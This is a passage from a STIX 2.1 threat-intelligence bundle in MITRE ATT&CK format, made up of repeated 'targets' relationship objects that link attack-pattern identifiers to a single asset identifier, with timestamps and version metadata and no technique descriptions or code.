"relationship--3c789f82-d63d-4311-aa27-d14d83163644", "created": "2024-07-01T10:37:15.834828", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834830", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fe0a3187-8e09-4db3-8420-e9aab90a257f", "created": "2024-07-01T10:37:15.834838", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834840", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--21d7b55a-8300-4f82-b08f-8c536ca5327c", "created": "2024-07-01T10:37:15.834847", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834849", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--40debe48-c5ba-4a44-85e2-9dd9c5cf0f51", "created": "2024-07-01T10:37:15.834857", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834859", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f2f19e47-4e53-4356-828b-2fcfc142fb22", "created": "2024-07-01T10:37:15.834866", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834869", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b5f20cb0-138d-484a-82a5-d3e6cabbe9bb", "created": "2024-07-01T10:37:15.834876", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834878", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b24c310-b97e-41bc-b328-d67c3daade28", "created": "2024-07-01T10:37:15.834886", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834888", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f665dac1-a3ab-4591-beca-950eeef79bc2", "created": "2024-07-01T10:37:15.834896", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834898", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f79ca0f-7041-403d-ad1e-3c1e12bc562b", "created": "2024-07-01T10:37:15.834906", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834908", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a4c3645b-9447-42ed-a53a-c7d38e55a082", "created": "2024-07-01T10:37:15.834915", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834918", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4866cd57-d75d-4e4b-b623-f1c25866fcb9", "created": "2024-07-01T10:37:15.834926", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834928", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--933390dd-60fb-4f97-b23d-0ff0b1bd2926", "created": "2024-07-01T10:37:15.834936", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834938", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--71e3d467-d631-4d03-a722-1b3fb8135b31", "created": "2024-07-01T10:37:15.834945", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834947", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--90f97493-313b-4914-b85b-62a676944c26", "created": "2024-07-01T10:37:15.834955", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834957", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bf0be74a-2747-48bb-a816-b2d6b12a0a8b", "created": "2024-07-01T10:37:15.834965", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834967", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0e62b53c-52c8-49f7-8b0f-7bd8d1c1312d", "created": "2024-07-01T10:37:15.834975", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834977", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--19d3738a-75fe-47b7-828c-bf54dba8ee08", "created": "2024-07-01T10:37:15.834985", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834987", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0e3eb899-54e9-4dba-8120-26fddcf43028", "created": "2024-07-01T10:37:15.834995", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.834997", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--edd01921-7d49-420e-b9c4-efca4b5b3d56", "created": "2024-07-01T10:37:15.835005", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835007", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf9346c8-ca07-46ec-8f48-f40292271213", "created": "2024-07-01T10:37:15.835015", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835017", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ff796d97-036a-4346-b10d-e6d8aca215a6", "created": "2024-07-01T10:37:15.835025", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835027", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32f69f12-9af4-47af-8e9d-966e139ae2de", "created": "2024-07-01T10:37:15.835034", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835036", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--470491f9-7035-4081-ba60-1fc28edb1f37", "created": "2024-07-01T10:37:15.835044", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835046", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--30bfd697-2903-411f-9b4c-8c581bcbe0df", "created": "2024-07-01T10:37:15.835054", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835056", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--651a88b5-7fb4-4583-a54c-5d33b8b1dbf7", "created": "2024-07-01T10:37:15.835063", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835065", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2918a349-adcb-4cd8-9e14-659bc3c9c522", "created": "2024-07-01T10:37:15.835073", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835075", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d93c46cc-6ee8-42f1-be9c-1eaa980dae68", "created": "2024-07-01T10:37:15.835082", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835085", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1501fd98-5157-46da-a8ce-2da430279c2d", "created": "2024-07-01T10:37:15.835092", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835094", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6b2ade0a-febe-4283-b370-6a879386b3a3", "created": "2024-07-01T10:37:15.835102", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835104", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3cdf916a-851f-4056-8494-8b9fe58c244c", "created": "2024-07-01T10:37:15.835111", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835114", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c0eeec75-dfff-44f1-8419-0a4d0ac4bd88", "created": "2024-07-01T10:37:15.835121", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835123", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--66137f69-e595-4344-ba6a-1a4cfbb060c1", "created": "2024-07-01T10:37:15.835131", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835133", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5c60ddf1-a44e-481e-be58-a44efcaa0a06", "created": "2024-07-01T10:37:15.835140", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835143", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--82b7625f-adc3-490d-b929-812bafd81a44", "created": "2024-07-01T10:37:15.835150", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835152", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9adc4ff1-255b-471c-9e19-b3f1a0a80b51", "created": "2024-07-01T10:37:15.835160", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835162", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d3ff7afe-621e-4120-aff1-4d80db09275b", "created": "2024-07-01T10:37:15.835170", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835172", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--973ad8da-468b-4490-af06-674e8edde4f5", "created": "2024-07-01T10:37:15.835179", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835182", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e2ed4837-5650-4347-857d-056763501e54", "created": "2024-07-01T10:37:15.835189", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835191", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2ec7ef7c-dea6-4442-8595-9a2dbe5acd06", "created": "2024-07-01T10:37:15.835199", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835201", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--22fef27a-42a6-447a-8e8a-1894fc1fbc4f", "created": "2024-07-01T10:37:15.835208", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835210", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1eb07a02-a333-482d-8ac4-09c79eb6f55e", "created": "2024-07-01T10:37:15.835218", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.835220", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--80ea6920-38b0-4e84-80c5-0d8213ae2c96", "created": "2024-07-01T10:37:15.835227", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": 